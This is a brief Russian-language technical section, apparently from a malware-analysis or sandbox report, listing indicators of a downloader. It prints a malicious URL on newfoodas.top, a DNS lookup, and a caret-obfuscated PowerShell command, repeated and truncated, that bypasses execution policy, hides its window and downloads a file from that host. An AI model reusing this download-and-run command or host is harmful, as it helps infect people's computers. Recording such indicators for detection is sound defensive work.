Техническая информация
- http://newfoodas.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^o^WER^s^H^E^Ll.^E^XE^ ^-^e^XE^cu^t^IOnPO^LIcY ByP^aSs -No^Pr^ofI^Le^ ^-wi^N^dO^w^styL^E^ H^id^Den (^NEw-^o^bj^EC^T sysT^eM.Ne^T.w^EbCLI^Ent).Do^Wnlo^ADFiLe('http://newf...
- DNS ASK ne###odas.top
- '<SYSTEM32>\cmd.exe' /C "P^o^WER^s^H^E^Ll.^E^XE^ ^-^e^XE^cu^t^IOnPO^LIcY ByP^aSs -No^Pr^ofI^Le^ ^-wi^N^dO^w^styL^E^ H^id^Den (^NEw-^o^bj^EC^T sysT^eM.Ne^T.w^EbCLI^Ent).Do^Wnlo^ADFiLe('http://newf...' (со скрытым окном)